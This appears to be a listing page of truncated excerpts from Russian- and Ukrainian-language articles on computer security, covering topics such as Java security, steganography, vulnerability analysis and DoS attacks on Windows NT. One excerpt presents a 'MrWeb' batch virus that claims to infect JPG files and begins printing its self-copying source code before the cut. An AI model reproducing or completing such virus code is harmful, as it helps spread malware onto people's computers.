Технология Java прочно завоевывает современный компьютерный мир. Ее широкие возможности по созданию распределенных вычислений не могут оставить равнодушными ни одного разработчика программного обеспечения. Однако часто бывает так, что серьезные возможности порождают не менее серьезные проблемы, связанные с обеспечением безопасности. Создатели Java предусмотрели определенные методы защиты данных при распределенных вычислениях, но сейчас еще трудно понять, насколько […]


ВведениеС расширением использования корпоративных сетей и сети Internet, профессионалы в области защиты сетей и информационных систем все больше осознают необходимость анализа и управления потенциальными рисками безопасности в своих сетях и системах. Анализ уязвимостей — это процесс обнаружения, оценки и ранжирования этих рисков, связанных с системами и устройствами, функционирующими на сетевом и системном уровнях, с целью […]


Задача надежной защиты информации от несанкционированного доступа является одной из древнейших и не решенных до настоящего времени проблем. Способы и методы скрытия секретных сообщений известны с давних времен, причем, данная сфера человеческой деятельности получила названиестеганография.Это слово происходит от греческих слов steganos (секрет, тайна) и graphy (запись) и, таким образом, означает буквально тайнопись, хотя методы стеганографии […]


Чи всі інформаційні системи потребують захисту? Відповідь на першу частину цього питання — так, але ось від чого їх потрібно захищати, залежить від характеру системи. Наприклад, персональний комп’ютер потребує захисту від проникнення вірусів, а для вибору надійної системи захисту автоматизованої системи обробки інформації, наприклад, кредитно-банківської системи треба визначити можливі канали просочення інформації та несанкціонованого доступу […]


Вам известно, что JPG-файлы — это картинки. И вы наверно слышали, что заражать их нельзя. Но на самом деле заражать можно почти все. Вот смотрите. Вирус заражает *.JPG в текущем каталоге.  ———————— резать тут —————————— @echo off%[MrWeb]% if ‘%1==’In_ goto MrWebin if exist c:MrWeb.bat goto MrWebru if not exist %0 goto MrWeben find «MrWeb»<%0>c:MrWeb.bat attrib […]


Как указывалось ранее, в сети Интернет все большее распространение получают атаки на доступность данных. Возможность их успешного проведения вытекает из уязвимости базовых протоколов информационного обмена в сети Интернет. Кроме этого, имеются типичные слабости реализации протоколов TCP/IP, наследуемые современными операционными системами. Рассмотрим атаки на доступность базовых функций Windows NT, получившие распространение в 1997-1998 rr. и вызвавшие […]


Торговые организации и банки довольно успешно пользуются Web-транзакциями в коммерческих целях; правительственные ведомства США также всерьез заинтересовались этой технологией. Однако как обстоят дела с информационной безопасностью? Достаточно ли совершенны, удобны и доступны по цене современные технологии управления доступом, шифрования данных и сертификации? Специалисты утверждают, что в настоящее время имеются все необходимые продукты для выполнения безопасных […]


В связи с возросшей информатизацией современного общества и увеличением числа объектов и потоков информации, которые необходимо защищать от несанкционированного доступа, а также необходимостью интеллектуализации всех форм взаимодействия пользователей автоматизированных систем управления с техническими средствами все более актуальными становятся проблемы использования механизмов речевых технологий для разграничения доступа к ИВС. Сегодня мы находимся на очередной стадии технической […]


Введение. Задача защиты информации, хранимой в компьютерных системах, от несанкционированного доступа (НСД), является весьма актуальной. Для решения этой задачи используется целый комплекс средств, включающий в себя технические, программно-аппаратные средства и административные меры защиты информации. Построение надежной защиты компьютерной системы невозможно без предварительного анализа возможных угроз безопасности системы тот анализ должен включать в себя: оценку ценности […]


«Байка живуча, наверное, благодаря своей правдоподобности» — такими словами заканчивалась заметка [1], в которой ставился вопрос о зарубежных компьютерах, выводимых из строя по телефонному звонку. Попробуем исследовать исторические корни проблемы. В 1988 году компанию Zenith Data Systems (США, Маунтин-Проспект) покинула группа инженеров-разработчиков, чтобы основать свое собственное дело. Факт сам по себе малопримечательный, однако уже через […]